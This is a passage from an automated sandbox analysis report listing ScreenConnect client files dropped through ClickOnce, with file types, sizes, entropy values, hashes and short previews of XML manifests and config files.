                                                                                                                                                                                                                                                      Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssemb
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):5256
                                                                                                                                                                                                                                                      Entropy (8bit):3.9631034962260023
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:Fiw4+RzgZheV+Ww7kkKJOlVx7lMqvfbNwnANbz:FfRzgYJuKS3y7Ap
                                                                                                                                                                                                                                                      MD5:43862C033554FB16396E87AF1527D267
                                                                                                                                                                                                                                                      SHA1:102857E506D1537409B3C773594B57D2DB0C19B6
                                                                                                                                                                                                                                                      SHA-256:B96A4A54A669C8C40F995039E9B5AF3E3DE6B5B951D0E3D3EBA900A4BA6DBA14
                                                                                                                                                                                                                                                      SHA-512:DDEA5B7E65C4E296C1EAAC83686783D79B000030F0CE092A768692E5E3BFCCA4CF31FC98BE845B529CE199A3B0AAA40A28C19DE0184AEDE07C928F922F3EC8D6
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1980
                                                                                                                                                                                                                                                      Entropy (8bit):5.059741759134869
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:JdFYZ8h9onRbggeP0AIvSkcyMwcVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AEHMwGQAXRTFgTo
                                                                                                                                                                                                                                                      MD5:22FE4BC3BB143D14D2142E096955F9B7
                                                                                                                                                                                                                                                      SHA1:332597F5A4D2D3724DCFDA19AF7734846CEDF474
                                                                                                                                                                                                                                                      SHA-256:39D81BE76E978E5D6BF4DC5F74226E48FA4EA77780A6792CAB947C5D20D4A6AA
                                                                                                                                                                                                                                                      SHA-512:508660E83C75AD55A11CDDC6381547536A4CBB5A4A940D3D17F77AD256C9943360650750343FE32C86F6DC462273AEAE68E40903F2C33A0AD9F09D393FB1B59F
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):6584
                                                                                                                                                                                                                                                      Entropy (8bit):4.011813215289127
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:7h0PPBpRZeV+Www+8Wp5ONN00UNw8adHR0OpNcmJYMTVqO/t7:2PPMJyp5I6o7pVR
                                                                                                                                                                                                                                                      MD5:D2E5F10CA82E094CC35051B156773FDA
                                                                                                                                                                                                                                                      SHA1:FFDBB2CAD133E412309082CEAE518BC278039C90
                                                                                                                                                                                                                                                      SHA-256:D7EDC6CF2A23BCBAF308033655676FE28CEEC29CFCA44282541E797C29690DE2
                                                                                                                                                                                                                                                      SHA-512:2AE278CC60CD489EB3EE7B724E1EAA0D7D6506222F3F548BEE8B05C74D6573728431A43E982089BD62F1B321B622283C4497B27CBD49781391B7524932E529A4
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2569
                                                                                                                                                                                                                                                      Entropy (8bit):5.030098902772427
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:3FYZ8h9o5gI0AbHMwAXQ3MwTMwRGTDBTo:1YiW4AohvNo
                                                                                                                                                                                                                                                      MD5:F89D1C01400FCD12B5BB47E952ECBBCF
                                                                                                                                                                                                                                                      SHA1:D23F66FF01B2D06227208FFC88D0A923E99F565A
                                                                                                                                                                                                                                                      SHA-256:D540814FA7D487264D0167616D1EABDB78B4D4C0795B124452108CB14675DC26
                                                                                                                                                                                                                                                      SHA-512:A4513910019A2D7DB8A414D4A53CE7AC51FF30BD5631115F465F96119FD80D911EE4F9FFED4CB4C464F0235DA6CF3967DA583570E23B55F55B6E3DAAAF947773
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):3032
                                                                                                                                                                                                                                                      Entropy (8bit):4.877510471723568
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:6a6Q/c/gJOe6S+9oww7gk7Fw+f7iI++5dFkEM6VbjftNNnwbOA:6aV/c7eV+WwwFFwOiMRkbortNNnEOA
                                                                                                                                                                                                                                                      MD5:497BC772A16CE7B708887C07DA250E9C
                                                                                                                                                                                                                                                      SHA1:93234536891191ADED308D4B57A722B0950728AF
                                                                                                                                                                                                                                                      SHA-256:838A718DB67E740915EBCD5055C9D33BE73B736978D6D4D77FB33ACCB3C5B91C
                                                                                                                                                                                                                                                      SHA-512:76A6BF765B8A55826E22B2ABAE8D39E1C6568709309C0A763C7202C1C8B4C3B83B0B097256901A405CA8BEFB01DB42971280EDEC29AC7CD717899D69CBC7122F
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1039
                                                                                                                                                                                                                                                      Entropy (8bit):5.154101033983839
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:MMHdF4XZ8i9o9olxbv5NEgVkP0AJR7vNxW57FpS+iENg49vNxW5NgMCNg49vNxWO:JdFYZ8h9onRigeP0AKvSkcyMwcVSkTo
                                                                                                                                                                                                                                                      MD5:CD5FD6DC905D01654E81EAD73F6CE116
                                                                                                                                                                                                                                                      SHA1:9A3ED5183F323F33C37755B90B45D401D45AC46C
                                                                                                                                                                                                                                                      SHA-256:51F959457A28D492E123B6B2982865716E8A811CF43DE856033C24CE34C0B187
                                                                                                                                                                                                                                                      SHA-512:25CA0DBBC602C6B61ACA7DA840A2353FD8C5C7FB3B311544DDCC3B1936B3A0F72A93D32E38093AB8B30935211EB4D260EC766EA5C9FBD90D50740EACA54BC052
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependent
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):14608
                                                                                                                                                                                                                                                      Entropy (8bit):5.715482282631327
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:G17T9rI6wOvx58s8oEtYLN8s8oTN2x2QPIlFDLhEDh7BqWojO3:G1P9rI6wAX9LX9R/QPIBM7Yj0
                                                                                                                                                                                                                                                      MD5:DC53C825D4BBAF4DB1F7D06E0647E9FA
                                                                                                                                                                                                                                                      SHA1:E74597EC15F95E355839E55AE06483D7DC922216
                                                                                                                                                                                                                                                      SHA-256:BBF11EFA32856814BD7A881787EB9534CFBB3A3C3DF385D12B766CB8C818B3EA
                                                                                                                                                                                                                                                      SHA-512:F534B1D895169AC38E0AD83D3753A128D6624518AAAA2784CFFC568A7350577EA83A4A71834AB3A1897E50B5352BFD48A05D2F9600B3DD2E44B8FF318C76803D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63849), with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):118229
                                                                                                                                                                                                                                                      Entropy (8bit):5.585370839513735
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3072:r7N8cT51/FXvMVNWfCXq9ymfm2o9HuzhJOvP:r6cfiVIBmt8vOvP
                                                                                                                                                                                                                                                      MD5:14CBFC8E1EE96D3503274F68DB7280B9
                                                                                                                                                                                                                                                      SHA1:964378CACB140A0771934E0D4B6EEEB18EE17B99
                                                                                                                                                                                                                                                      SHA-256:490F27B351F34197BEA76860091B7EBAB90F8427BD79C95889D2A12222C5CC00
                                                                                                                                                                                                                                                      SHA-512:410605A4400CA3A5C3F90E998755B5D76013E2314990A51F6F08150E8CC370FB8EC14F3F2B3D180B61322489D7F2672C0AB70F9EC7E4A6CE1566BBAE77A6AE2E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.2.3.8936" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tru
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):4428
                                                                                                                                                                                                                                                      Entropy (8bit):4.197497755898537
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:/jCDvx+NgJhe6S+9ow87g5W75uvs/9BnTN41rRp3W6QQCM3RTyA9Uvso9f:/jMeV+Ww8+45ugo1H3RvzRTyOmBf
                                                                                                                                                                                                                                                      MD5:877B52E25DE7E0BA8649C290E7E97AE0
                                                                                                                                                                                                                                                      SHA1:3DD7B8724EB6E455258F0EF42A5ADA369D8CC073
                                                                                                                                                                                                                                                      SHA-256:3FE84FC2B5A6D0A68A16308594F1603566C6FAB032AD5D5207732B1A6884192F
                                                                                                                                                                                                                                                      SHA-512:26C616871CC839B4D045FC6A3C38C31BF9C6FF125A3EB6214588028296B78C8176AC823DD3162D5CD20AE82DF3973932DEB955AD720B5ED8BE59D1CBE0EB4B92
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1632
                                                                                                                                                                                                                                                      Entropy (8bit):5.092740375848212
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:JdFYZ8h9onRzgeP0AW+vSkcyMwcbEMwcuMwcVSkcf5bdTo:3FYZ8h9o9gI0AWCHMwTMw3MwGAXTo
                                                                                                                                                                                                                                                      MD5:219DBCD947D7BBDF0BBC78778286B8C7
                                                                                                                                                                                                                                                      SHA1:E95D66F48C130644CE421CBBBFCF3D376FEBAC4E
                                                                                                                                                                                                                                                      SHA-256:C92BB401516771F702CD0986219589CA90E7DE089C8CF4DD825D904985299796
                                                                                                                                                                                                                                                      SHA-512:9E147F80D629AA00C4E0CB8DB708635BA6C14FDE30B8A5574927197352747B43B063060EB4D201C2B4AC984A9F4C84F5F774EB29DE481A0FEE572FB7B0C31F13
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" version=
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):95520
                                                                                                                                                                                                                                                      Entropy (8bit):6.504144260093153
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:Sg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoU0HMu7axl:jhbNDxZGXfdHrX7rAc6myJkgoU0HVI
                                                                                                                                                                                                                                                      MD5:200A917996F0FC74879076354454473A
                                                                                                                                                                                                                                                      SHA1:15886A7D4385D7EC4F7C8837D7218D46E5B3DD9C
                                                                                                                                                                                                                                                      SHA-256:0B2824097ABE3211AAC5FEDA8DC4D300BA51801D9FBED9EB8330B433A66AC001
                                                                                                                                                                                                                                                      SHA-512:B9133EA853AAF6BB2F5EFD7B65A4559701C37D992D8E9CC79BF181CD8CECF0D436077278DDD87725FB5E59BB2962D0FBC111BF0C7E1C760688D01BA4FA4F003E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                                                                                                                      • Filename: Qjq85KfhBC.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      • Filename: khwHsyfsJ1.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      • Filename: e5mSvqt7Ho.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      • Filename: 96r3GgxntQ.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      • Filename: xrWUzly94Z.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      • Filename: EPCo9k8NIn.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      • Filename: X5zNv1VJia.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      • Filename: AmedVA2n92.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      • Filename: z7NLXIia8r.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      • Filename: wbxZk3AvuB.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):61216
                                                                                                                                                                                                                                                      Entropy (8bit):6.311801757323114
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:EW/+lo6MOc8IoiKWj8Nv8DtyQ4RE+TC6GAhVby97sxd:ELlo6dcclCyQGGn9G
                                                                                                                                                                                                                                                      MD5:C754141304DE3EBAD8ECEEA033356AD6
                                                                                                                                                                                                                                                      SHA1:6AC5D18F1525878FA83E5A93F606AFC58DC7D949
                                                                                                                                                                                                                                                      SHA-256:B1B8A3AD61C1ECED612C442442CC2CF73E2E4B81ACFC8EDFDB3DDEEBAE1E6D78
                                                                                                                                                                                                                                                      SHA-512:81C3B134A2C7C591607ACAC6F9C7881BF0BC194903339534943D65DF49E904BC7FAEEA2A350A4314E28DB2C913C2183C9D3ECF6CA03EB082F5EA461D1E4A6333
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):266
                                                                                                                                                                                                                                                      Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                      MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                      SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                      SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                      SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):266
                                                                                                                                                                                                                                                      Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                      MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                      SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                      SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                      SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):81696
                                                                                                                                                                                                                                                      Entropy (8bit):5.8611828051677515
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:Atygl44gzbJI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7wk7bOxrk:r+kukLd0kv+k
                                                                                                                                                                                                                                                      MD5:66E3A8246447DECC97AB63A3485B8DE4
                                                                                                                                                                                                                                                      SHA1:2630B84AD3328A1E1CAE11CDF1D7CA2AFC5DB607
                                                                                                                                                                                                                                                      SHA-256:04A113517425FA2544367F4D343FB04AEE582E6CF2E387EAA9A92B7303652973
                                                                                                                                                                                                                                                      SHA-512:363BFBD98B5C49CDF7201AA196D1FEA8EAA905EC531E585FB941B246C881390340AB9CA19996564D32A26CADFC46715C48A15A9E2A08E5760F014E65C9220F11
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):266
                                                                                                                                                                                                                                                      Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                      MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                      SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                      SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                      SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):548352
                                                                                                                                                                                                                                                      Entropy (8bit):6.045519732283216
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6144:YtkHq9BVYKH062PQHz0k4NbuI2Tt1QsEaVQQUzxmj8/lmQpnGGlsGdmACEhHkG5Y:YNpZZasEbJ0OnGGlNkuMHCzzdU
                                                                                                                                                                                                                                                      MD5:D0B5084C680C798B5340D2E61CA5E06C
                                                                                                                                                                                                                                                      SHA1:C4F4DE6B77589A8D853F565C99DEF5DBFB230725
                                                                                                                                                                                                                                                      SHA-256:D933498CD929C57AAB0C3AF908E0FE617213DD67C13E39B2A1D68B8F21849A7A
                                                                                                                                                                                                                                                      SHA-512:E14E32D981F4926FE80A4C45D5DFCDCDC3B78DC63556FFBFB4DCE61C2818E6AA2FD5BACC5734970BDE017AC3FDCF0E24FABCC68C1C99C98A84095394E46391B5
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1721856
                                                                                                                                                                                                                                                      Entropy (8bit):6.638253108372186
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24576:qGPFFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPTsUTM:DPFJkGYYpT0+TFiH7efP
                                                                                                                                                                                                                                                      MD5:F4E602A8A0FD88FF3FFDAC946C21E567
                                                                                                                                                                                                                                                      SHA1:1B9D9F1581F780485A325A35DCD29A16B213591C
